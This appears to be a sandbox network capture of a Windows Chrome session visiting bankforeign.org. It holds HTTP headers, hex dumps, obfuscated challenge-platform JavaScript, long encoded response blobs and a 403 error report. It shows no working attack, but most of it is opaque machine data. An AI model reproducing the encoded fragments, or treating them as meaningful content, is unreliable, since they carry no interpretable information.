                                                            2024-02-01 20:38:10 UTC1369INData Raw: 2c 6d 2c 21 21 5b 5d 29 2c 6e 5b 6a 5a 28 34 30 36 29 5d 3d 32 35 30 30 2c 6e 5b 6a 5a 28 32 39 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6e 5b 6a 5a 28 31 35 32 33 29 5d 28 6a 5b 6a 5a 28 31 35 31 38 29 5d 2c 6a 5a 28 31 31 32 36 29 29 2c 73 3d 7b 7d 2c 73 5b 6a 5a 28 31 33 33 31 29 5d 3d 66 2c 73 2e 63 63 3d 67 2c 73 5b 6a 5a 28 31 38 33 30 29 5d 3d 6b 2c 75 3d 4a 53 4f 4e 5b 6a 5a 28 31 32 35 34 29 5d 28 73 29 2c 77 3d 66 48 5b 6a 5a 28 31 36 37 37 29 5d 28 75 29 5b 6a 5a 28 38 39 39 29 5d 28 27 2b 27 2c 6a 5a 28 31 30 38 34 29 29 2c 6e 5b 6a 5a 28 31 33 31 31 29 5d 28 6a 5b 6a 5a 28 37 34 39 29 5d 28 27 76 5f 27 2b 66 78 5b 6a 5a 28 32 30 34 33 29 5d 5b 6a 5a 28 37 36 32 29 5d 2c 27 3d 27 29 2b 77 29 7d 63 61 74 63 68 28 78 29 7b 7d 7d 2c 66
                                                            Data Ascii: ,m,!![]),n[jZ(406)]=2500,n[jZ(295)]=function(){},n[jZ(1523)](j[jZ(1518)],jZ(1126)),s={},s[jZ(1331)]=f,s.cc=g,s[jZ(1830)]=k,u=JSON[jZ(1254)](s),w=fH[jZ(1677)](u)[jZ(899)]('+',jZ(1084)),n[jZ(1311)](j[jZ(749)]('v_'+fx[jZ(2043)][jZ(762)],'=')+w)}catch(x){}},f
                                                            2024-02-01 20:38:10 UTC1369INData Raw: 67 41 72 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 3d 3d 3d 6d 7d 2c 27 56 51 4b 4a 48 27 3a 6b 34 28 31 39 34 37 29 2c 27 58 64 72 4f 66 27 3a 6b 34 28 31 30 38 34 29 7d 2c 65 3d 65 7c 7c 30 2c 65 3e 3d 35 29 72 65 74 75 72 6e 20 76 6f 69 64 20 66 78 5b 6b 34 28 31 38 38 32 29 5d 28 29 3b 69 66 28 67 3d 21 5b 5d 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 6b 36 2c 6c 29 7b 69 66 28 6b 36 3d 6b 34 2c 6c 3d 7b 27 73 54 4a 42 74 27 3a 66 75 6e 63 74 69 6f 6e 28 6d 2c 6e 2c 6b 35 29 7b 72 65 74 75 72 6e 20 6b 35 3d 62 2c 66 5b 6b 35 28 31 38 34 33 29 5d 28 6d 2c 6e 29 7d 7d 2c 67 29 72 65 74 75 72 6e 3b 67 3d 21 21 5b 5d 2c 66 78 5b 6b 36 28 37 36 35 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6b 37 29 7b 6b 37 3d 6b 36 2c 66 78 5b 6b 37 28 31
                                                            Data Ascii: gAr':function(l,m){return l===m},'VQKJH':k4(1947),'XdrOf':k4(1084)},e=e||0,e>=5)return void fx[k4(1882)]();if(g=![],h=function(k6,l){if(k6=k4,l={'sTJBt':function(m,n,k5){return k5=b,f[k5(1843)](m,n)}},g)return;g=!![],fx[k6(765)](function(k7){k7=k6,fx[k7(1


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.44974035.190.80.14433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:11 UTC534OUTOPTIONS /report/v3?s=XWonk4WN1fK11FFTlQAyh5jVGD5LFYIuZ6cyrtPkH5WgwrJJZ6GQ6PQqhS7tgzMVD%2FJPbrnp1dK97yUgyQFNns5HCnxhVvorXpveZxyHEpk%2FOWfQ6IW6or1db8YkiaLJSXI%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Origin: https://bankforeign.org
                                                            Access-Control-Request-Method: POST
                                                            Access-Control-Request-Headers: content-type
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:11 UTC336INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            access-control-max-age: 86400
                                                            access-control-allow-methods: POST, OPTIONS
                                                            access-control-allow-origin: *
                                                            access-control-allow-headers: content-type, content-length
                                                            date: Thu, 01 Feb 2024 20:38:10 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.449743104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:11 UTC1053OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/461457:1706818037:TP9mi9T_s6X4VHjzA43SctCQXweCPTtEqjXfreTTO6Q/84ecff1778c36766/f5b0b7c7d91ebf9 HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            Content-Length: 1860
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-arch: "x86"
                                                            Content-type: application/x-www-form-urlencoded
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-model: ""
                                                            CF-Challenge: f5b0b7c7d91ebf9
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://bankforeign.org
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://bankforeign.org/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:11 UTC1860OUTData Raw: 76 5f 38 34 65 63 66 66 31 37 37 38 63 33 36 37 36 36 3d 24 42 6b 30 77 30 32 30 35 30 74 30 57 30 57 4b 37 41 4b 37 58 61 6b 50 32 6c 6a 69 6a 64 46 37 6f 43 37 32 34 30 32 31 50 37 55 4e 37 37 61 45 30 32 6c 62 64 37 69 37 7a 75 79 30 37 53 58 6a 37 43 30 64 47 37 73 45 61 50 38 46 41 30 35 6c 37 45 30 38 79 37 49 30 35 57 58 7a 58 46 47 6b 38 6f 37 44 4d 72 75 37 4f 47 39 6f 51 6b 54 34 45 32 6d 5a 37 64 6b 38 44 57 37 4a 50 75 37 78 34 32 53 31 49 37 57 56 71 53 2d 7a 37 38 44 73 37 61 50 6e 6b 7a 76 6a 24 61 78 37 35 74 75 37 6f 42 6d 37 6f 50 37 46 62 55 6c 63 30 38 36 36 32 50 74 36 59 45 37 24 56 30 37 72 48 69 6c 37 35 42 61 36 32 37 56 49 69 42 50 32 37 37 77 6d 4e 36 72 35 24 45 37 69 30 32 44 43 34 32 7a 55 65 2d 75 61 30 64 64 31 64 42 37 50
                                                            Data Ascii: v_84ecff1778c36766=$Bk0w02050t0W0WK7AK7XakP2ljijdF7oC724021P7UN77aE02lbd7i7zuy07SXj7C0dG7sEaP8FA05l7E08y7I05WXzXFGk8o7DMru7OG9oQkT4E2mZ7dk8DW7JPu7x42S1I7WVqS-z78Ds7aPnkzvj$ax75tu7oBm7oP7FbUlc08662Pt6YE7$V07rHil75Ba627VIiBP277wmN6r5$E7i02DC42zUe-ua0dd1dB7P
                                                            2024-02-01 20:38:11 UTC656INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:11 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-chl-gen: 4eWjccmEKj8njdd5wnz9ukJAsj9ZqRnXBT2mQxGaIb9ovpVlkhrK2TakcfmOcgzK$USdwMJ5ATRSW8caos8kWnA==
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3Xfahk1sG8nBKmTLGlu%2BYImhyO6B621MLbNQcy5V38Ndu1kZzOETqf3hkXENBu7VI%2FVtV0CUsmvj%2BI45CQd%2Bk9fUF41JA7WrR089LQcTyPiV0Fv8HrHc9NeViCEa%2BSLKAqM%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ecff214e724569-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:11 UTC713INData Raw: 33 34 64 38 0d 0a 59 4a 65 43 64 32 74 6c 6c 45 2b 61 63 6e 36 61 6e 5a 78 67 70 49 57 61 65 5a 65 4a 70 32 71 4e 72 32 56 71 6a 36 36 30 6b 6f 4b 69 72 61 69 43 68 4c 56 36 6c 6f 69 35 66 70 78 36 77 62 32 74 66 34 65 48 6e 6e 79 35 78 59 69 4e 69 4d 50 4b 77 4c 43 73 73 4d 75 34 7a 4e 48 4f 72 4c 6d 72 71 4f 43 38 32 62 79 76 75 64 2b 63 77 2b 66 68 79 4c 69 2f 36 62 62 46 70 73 69 37 75 2b 4b 39 77 50 54 44 39 74 48 6c 2b 66 57 33 31 4e 55 44 36 73 2f 41 38 39 72 61 77 74 37 48 42 2f 33 71 2b 4d 6a 70 45 66 49 48 37 51 37 70 31 64 4c 78 31 78 63 4f 39 51 7a 61 47 4e 4d 4e 38 78 58 74 46 77 62 61 36 65 45 6f 4a 67 37 6d 49 77 59 4c 44 65 34 53 44 41 73 51 4b 50 6b 71 39 50 77 75 39 52 34 35 4f 42 67 31 2f 53 39 44 51 54 49 57 53 44 6f 49 4b 52 77 2f 48
                                                            Data Ascii: 34d8YJeCd2tllE+acn6anZxgpIWaeZeJp2qNr2Vqj660koKiraiChLV6loi5fpx6wb2tf4eHnny5xYiNiMPKwLCssMu4zNHOrLmrqOC82byvud+cw+fhyLi/6bbFpsi7u+K9wPTD9tHl+fW31NUD6s/A89rawt7HB/3q+MjpEfIH7Q7p1dLx1xcO9QzaGNMN8xXtFwba6eEoJg7mIwYLDe4SDAsQKPkq9Pwu9R45OBg1/S9DQTIWSDoIKRw/H
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 54 68 71 65 64 6f 71 61 45 72 62 4a 39 6a 33 2b 44 6a 5a 57 44 73 5a 6d 37 6c 4b 75 4e 74 35 61 67 74 34 43 57 72 37 75 70 6b 70 2b 2f 72 5a 61 62 77 37 47 61 6d 38 65 31 6e 59 37 4c 75 61 47 57 7a 37 32 6c 33 64 50 42 72 64 58 58 78 62 48 56 32 38 6d 31 79 63 62 56 75 39 32 36 71 39 71 38 38 2f 4c 49 38 4b 37 45 30 39 4c 4f 35 4f 6a 63 2b 66 7a 37 38 38 2f 5a 34 4d 48 45 33 76 4c 42 34 4f 58 61 32 4d 2f 4e 44 67 7a 7a 46 73 37 53 46 51 4c 35 39 4f 77 4c 46 50 6a 6f 44 50 45 41 38 65 49 51 2f 66 6b 6c 2f 41 73 42 2f 50 59 74 42 67 4d 69 4b 42 38 45 45 43 30 59 42 6a 4c 30 42 44 6f 51 2f 42 4a 42 47 76 6f 42 4d 6b 63 54 2f 67 67 46 4d 78 67 33 42 42 63 6e 44 69 63 52 4b 46 59 69 44 6b 34 72 55 6b 6f 54 52 6b 63 5a 4d 6c 30 31 50 44 45 34 57 46 34 35 59 6c
                                                            Data Ascii: ThqedoqaErbJ9j3+DjZWDsZm7lKuNt5agt4CWr7upkp+/rZabw7Gam8e1nY7LuaGWz72l3dPBrdXXxbHV28m1ycbVu926q9q88/LI8K7E09LO5Ojc+fz788/Z4MHE3vLB4OXa2M/NDgzzFs7SFQL59OwLFPjoDPEA8eIQ/fkl/AsB/PYtBgMiKB8EEC0YBjL0BDoQ/BJBGvoBMkcT/ggFMxg3BBcnDicRKFYiDk4rUkoTRkcZMl01PDE4WF45Yl
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 65 71 6d 6c 71 49 69 78 73 6f 4e 77 74 37 43 51 6a 72 53 77 75 62 4f 69 78 4a 2f 42 6e 61 4b 35 75 5a 61 6d 6c 38 57 59 71 70 76 49 69 36 36 66 7a 4e 53 34 73 4e 4f 56 75 72 33 59 74 4a 69 79 79 64 54 6a 6f 72 4b 64 75 65 4c 6e 32 75 47 6b 35 65 57 75 77 36 75 76 71 72 33 65 31 73 50 7a 35 39 72 74 32 50 33 6e 38 66 4c 74 34 2f 58 51 30 2b 66 35 30 2b 6a 68 36 2b 50 34 33 63 38 4d 32 65 37 4a 43 67 66 4f 47 41 50 53 30 75 34 49 46 64 63 53 47 52 6b 54 2f 76 4d 6e 37 2f 45 43 34 69 73 42 46 77 72 70 36 69 41 7a 44 50 45 74 42 41 34 4f 37 79 63 78 37 54 7a 7a 43 6a 7a 32 47 66 73 51 4e 53 52 42 47 54 30 7a 54 43 51 6d 4a 7a 30 34 49 78 73 4d 46 45 38 71 4a 52 56 55 55 79 56 45 56 6b 63 39 58 6c 70 62 46 56 4a 61 52 31 4a 6a 5a 7a 35 6a 4a 32 64 76 4c 6b 68
                                                            Data Ascii: eqmlqIixsoNwt7CQjrSwubOixJ/BnaK5uZaml8WYqpvIi66fzNS4sNOVur3YtJiyydTjorKdueLn2uGk5eWuw6uvqr3e1sPz59rt2P3n8fLt4/XQ0+f50+jh6+P43c8M2e7JCgfOGAPS0u4IFdcSGRkT/vMn7/EC4isBFwrp6iAzDPEtBA4O7ycx7TzzCjz2GfsQNSRBGT0zTCQmJz04IxsMFE8qJRVUUyVEVkc9XlpbFVJaR1JjZz5jJ2dvLkh
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 49 71 68 72 4c 74 36 6a 72 4b 2f 63 6e 2b 4b 6f 36 57 30 76 37 47 35 67 4d 61 32 79 4b 4b 6a 76 70 72 4d 7a 73 2b 78 76 71 79 55 32 4b 32 75 78 61 6d 32 7a 4a 6e 41 6e 61 75 32 32 64 4b 59 70 62 32 68 74 61 6a 61 70 71 79 76 72 37 43 75 33 61 33 66 78 38 33 72 73 75 50 57 39 2b 33 79 39 74 54 39 41 65 48 64 31 50 6e 56 41 4e 34 44 41 4d 6a 65 2b 65 72 35 37 77 4c 65 44 77 49 51 31 51 6f 50 2b 52 33 4f 44 41 33 71 44 68 55 69 44 67 62 2b 4b 41 41 70 4b 65 4c 68 41 2b 73 61 43 4f 49 6f 43 44 44 71 49 77 34 4f 47 41 38 77 42 68 67 31 4b 6a 54 33 41 43 4d 37 50 53 45 61 51 6b 59 37 4a 52 30 69 50 43 6b 4e 47 6b 49 73 4d 79 5a 53 4d 54 55 59 47 69 63 63 52 7a 78 4f 57 69 77 66 51 56 4e 6b 59 55 64 6a 51 6c 78 68 4a 30 45 74 4f 6b 4a 6a 4c 7a 35 4c 52 55 31 44
                                                            Data Ascii: IqhrLt6jrK/cn+Ko6W0v7G5gMa2yKKjvprMzs+xvqyU2K2uxam2zJnAnau22dKYpb2htajapqyvr7Cu3a3fx83rsuPW9+3y9tT9AeHd1PnVAN4DAMje+er57wLeDwIQ1QoP+R3ODA3qDhUiDgb+KAApKeLhA+saCOIoCDDqIw4OGA8wBhg1KjT3ACM7PSEaQkY7JR0iPCkNGkIsMyZSMTUYGiccRzxOWiwfQVNkYUdjQlxhJ0EtOkJjLz5LRU1D
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 71 49 6c 4a 47 43 73 70 70 2f 77 72 79 53 78 4a 54 45 70 71 61 71 7a 61 2f 4c 72 72 75 69 78 63 54 4c 31 61 72 47 79 74 57 2b 33 4b 69 30 73 71 2f 54 75 39 72 6a 6f 65 69 6f 71 4e 57 6f 7a 4e 36 2b 33 36 76 4c 37 74 36 74 37 66 54 69 78 2f 58 38 76 4d 66 72 34 50 71 33 33 4f 50 50 76 66 72 50 32 74 48 39 2b 2b 77 42 31 2b 72 5a 44 2b 37 6a 33 65 77 42 35 39 58 77 32 65 76 6b 35 51 33 6f 34 4e 6a 2b 42 50 49 57 46 52 38 69 35 77 62 30 41 66 33 6d 49 41 67 6e 4d 52 33 30 39 44 51 4f 38 67 38 55 43 79 72 30 46 43 41 66 44 7a 49 6b 49 78 4d 32 4b 43 55 44 41 30 45 70 47 79 52 48 4c 45 68 47 54 6b 4d 4e 52 6b 78 49 54 79 6b 59 4e 53 6f 76 58 6a 64 4b 50 54 39 58 49 31 64 58 59 43 6c 54 56 57 49 2f 49 57 56 44 50 79 56 4b 4d 30 68 34 54 79 38 30 52 6b 30 34 56
                                                            Data Ascii: qIlJGCspp/wrySxJTEpqaqza/LrruixcTL1arGytW+3Ki0sq/Tu9rjoeioqNWozN6+36vL7t6t7fTix/X8vMfr4Pq33OPPvfrP2tH9++wB1+rZD+7j3ewB59Xw2evk5Q3o4Nj+BPIWFR8i5wb0Af3mIAgnMR309DQO8g8UCyr0FCAfDzIkIxM2KCUDA0EpGyRHLEhGTkMNRkxITykYNSovXjdKPT9XI1dXYClTVWI/IWVDPyVKM0h4Ty80Rk04V
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 45 67 72 4b 6b 68 49 57 31 77 4b 6d 68 70 5a 32 4b 75 36 37 50 78 63 72 4f 72 4e 58 59 70 62 65 6e 71 37 57 39 71 39 6e 42 34 37 7a 54 74 64 2b 2b 79 4e 2b 6f 76 74 66 6a 30 62 72 48 35 39 57 2b 77 2b 76 5a 77 73 50 38 78 74 69 32 2f 75 6a 68 34 74 33 37 37 64 69 35 78 4d 50 47 34 38 7a 4d 79 75 72 61 34 51 6a 4b 33 65 44 4e 38 51 66 75 30 2b 6a 55 32 65 6a 31 46 76 50 79 48 66 6e 76 33 65 41 42 4b 74 77 6a 35 53 51 62 43 43 67 43 45 68 38 45 4e 78 4d 67 4a 6a 63 74 2b 41 6f 79 38 44 50 33 51 43 54 37 2b 6a 6b 53 52 68 49 6d 49 53 4a 4e 4a 43 51 5a 4f 51 77 6c 48 45 45 4d 54 44 67 5a 4d 6b 74 4e 4b 6a 6b 2f 48 54 74 59 4c 6c 42 58 58 6d 64 6e 58 57 55 6b 53 79 64 58 58 30 56 6a 4d 55 45 76 63 6a 52 56 64 58 64 62 62 47 35 76 4f 59 42 70 64 6b 4b 45 55 59
                                                            Data Ascii: EgrKkhIW1wKmhpZ2Ku67PxcrOrNXYpbenq7W9q9nB47zTtd++yN+ovtfj0brH59W+w+vZwsP8xti2/ujh4t377di5xMPG48zMyura4QjK3eDN8Qfu0+jU2ej1FvPyHfnv3eABKtwj5SQbCCgCEh8ENxMgJjct+Aoy8DP3QCT7+jkSRhImISJNJCQZOQwlHEEMTDgZMktNKjk/HTtYLlBXXmdnXWUkSydXX0VjMUEvcjRVdXdbbG5vOYBpdkKEUY
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 79 73 71 4a 6f 4b 36 4f 6d 36 75 77 6f 36 57 33 79 4b 4c 58 78 74 79 7a 6c 37 62 53 73 64 2b 2f 6f 4b 37 41 32 5a 2f 44 34 4f 58 48 71 38 76 77 33 4f 66 69 76 71 37 67 35 2b 69 33 74 66 58 54 2f 50 79 32 74 64 61 7a 37 74 44 73 39 63 54 59 31 76 72 72 34 67 7a 6d 34 39 30 4c 45 39 44 72 2f 75 58 30 44 39 50 58 7a 4e 55 47 48 66 58 73 44 66 45 4e 2b 4f 7a 35 33 66 33 61 45 75 4d 6f 4a 50 55 5a 47 79 6a 75 4b 78 51 6e 4e 54 59 4a 44 41 59 51 4f 2f 49 63 47 44 67 66 44 78 34 33 52 6b 4a 41 50 79 51 32 54 44 35 4a 47 77 59 36 49 30 46 42 4b 30 35 4f 43 56 4e 59 4c 6c 41 6d 58 44 49 74 46 30 35 41 52 46 78 44 4d 31 42 67 48 30 4a 48 4e 43 4e 71 4c 30 55 77 62 6b 30 78 56 45 38 75 63 45 64 45 63 45 5a 37 55 44 46 34 65 33 78 33 56 33 35 77 66 34 47 48 58 45 53
                                                            Data Ascii: ysqJoK6Om6uwo6W3yKLXxtyzl7bSsd+/oK7A2Z/D4OXHq8vw3Ofivq7g5+i3tfXT/Py2tdaz7tDs9cTY1vrr4gzm490LE9Dr/uX0D9PXzNUGHfXsDfEN+Oz53f3aEuMoJPUZGyjuKxQnNTYJDAYQO/IcGDgfDx43RkJAPyQ2TD5JGwY6I0FBK05OCVNYLlAmXDItF05ARFxDM1BgH0JHNCNqL0Uwbk0xVE8ucEdEcEZ7UDF4e3x3V35wf4GHXES
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 35 75 39 6a 4e 47 74 77 4b 61 57 30 72 47 73 75 37 71 38 34 71 2b 38 78 64 69 65 30 73 53 34 73 39 58 4e 75 71 58 74 33 38 48 6b 37 39 37 6d 35 4c 4c 6a 73 63 66 4c 30 63 75 31 2b 2b 6a 62 75 74 76 75 31 4e 76 32 33 50 37 4b 32 2f 77 48 79 41 58 4e 44 51 50 4c 41 2f 55 44 36 51 4d 4d 45 2b 30 48 39 78 37 78 38 79 50 75 48 76 63 6e 37 69 6a 39 42 43 6b 73 2f 69 2f 36 4d 51 54 38 42 79 30 49 4a 77 66 76 46 50 41 31 38 69 30 4f 46 2f 59 63 2b 54 70 41 47 53 4d 62 52 53 55 6f 49 52 6b 34 4b 30 31 4e 4a 45 51 50 42 6a 34 4f 45 79 77 31 46 43 30 6b 50 46 42 61 4e 30 6f 62 4c 46 35 55 51 7a 30 78 55 6b 6f 30 51 30 67 6e 5a 57 39 4d 50 6d 6c 31 53 44 46 41 4b 6d 64 61 52 33 5a 52 62 30 2b 42 62 6e 49 2b 67 31 6c 33 55 34 64 6a 67 46 65 4b 65 6d 69 4b 55 47 57 48
                                                            Data Ascii: 5u9jNGtwKaW0rGsu7q84q+8xdie0sS4s9XNuqXt38Hk797m5LLjscfL0cu1++jbutvu1Nv23P7K2/wHyAXNDQPLA/UD6QMME+0H9x7x8yPuHvcn7ij9BCks/i/6MQT8By0IJwfvFPA18i0OF/Yc+TpAGSMbRSUoIRk4K01NJEQPBj4OEyw1FC0kPFBaN0obLF5UQz0xUko0Q0gnZW9MPml1SDFAKmdaR3ZRb0+BbnI+g1l3U4djgFeKemiKUGWH
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 43 34 76 4c 4b 54 7a 35 69 70 71 64 57 32 30 4c 53 6a 74 73 66 64 70 64 58 65 7a 65 72 4a 35 73 4b 6b 76 76 50 72 37 38 79 77 32 64 48 78 75 50 6a 5a 35 2b 2b 36 34 2f 72 6c 2b 76 67 44 78 2f 6a 64 32 41 30 44 43 38 45 48 44 2f 4c 73 42 2b 4c 67 42 67 2f 71 32 68 62 34 2b 50 6f 53 2f 68 37 68 37 68 30 6d 2f 4f 62 6e 4b 66 49 74 4b 69 62 6b 42 51 38 73 48 67 45 42 42 44 45 4a 4c 54 49 34 4b 78 59 58 4c 53 67 54 44 42 6c 41 4e 79 64 44 4f 45 63 6a 42 53 55 4e 48 79 6b 73 4a 43 59 37 44 6c 56 48 49 69 38 35 4a 78 63 77 4f 44 49 57 56 69 34 2b 51 52 39 4f 55 46 67 36 5a 54 31 68 58 56 56 70 4a 6d 46 44 59 57 46 50 63 6d 35 46 53 32 74 7a 52 31 46 6f 4e 6c 63 36 66 45 31 57 62 59 42 4f 50 58 4a 44 68 49 78 66 5a 49 6c 59 54 49 6c 70 68 6e 4f 47 55 56 53 43 6a
                                                            Data Ascii: C4vLKTz5ipqdW20LSjtsfdpdXezerJ5sKkvvPr78yw2dHxuPjZ5++64/rl+vgDx/jd2A0DC8EHD/LsB+LgBg/q2hb4+PoS/h7h7h0m/ObnKfItKibkBQ8sHgEBBDEJLTI4KxYXLSgTDBlANydDOEcjBSUNHyksJCY7DlVHIi85JxcwODIWVi4+QR9OUFg6ZT1hXVVpJmFDYWFPcm5FS2tzR1FoNlc6fE1WbYBOPXJDhIxfZIlYTIlphnOGUVSCj


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.44974223.36.68.63443
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:11 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            Accept-Encoding: identity
                                                            User-Agent: Microsoft BITS/7.8
                                                            Host: fs.microsoft.com
                                                            2024-02-01 20:38:11 UTC531INHTTP/1.1 200 OK
                                                            Content-Type: application/octet-stream
                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                            X-Ms-ApiVersion: Distribute 1.2
                                                            X-Ms-Region: prod-eus-z1
                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                            X-MSEdge-Ref: Ref A: A05B85F829A64023B791D254C6CAF667 Ref B: CHGEDGE1206 Ref C: 2024-01-30T12:37:55Z
                                                            Cache-Control: public, max-age=57596
                                                            Date: Thu, 01 Feb 2024 20:38:11 GMT
                                                            Connection: close
                                                            X-CID: 2


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.44974435.190.80.14433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:11 UTC476OUTPOST /report/v3?s=XWonk4WN1fK11FFTlQAyh5jVGD5LFYIuZ6cyrtPkH5WgwrJJZ6GQ6PQqhS7tgzMVD%2FJPbrnp1dK97yUgyQFNns5HCnxhVvorXpveZxyHEpk%2FOWfQ6IW6or1db8YkiaLJSXI%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 385
                                                            Content-Type: application/reports+json
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:11 UTC385OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 32 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 37 33 2e 38 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 61 6e 6b 66 6f 72 65 69 67 6e 2e 6f 72 67 2f
                                                            Data Ascii: [{"age":22,"body":{"elapsed_time":829,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.73.88","status_code":403,"type":"http.error"},"type":"network-error","url":"https://bankforeign.org/
                                                            2024-02-01 20:38:11 UTC168INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            date: Thu, 01 Feb 2024 20:38:11 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.449745104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:11 UTC858OUTGET /favicon.ico HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-arch: "x86"
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-model: ""
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://bankforeign.org/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
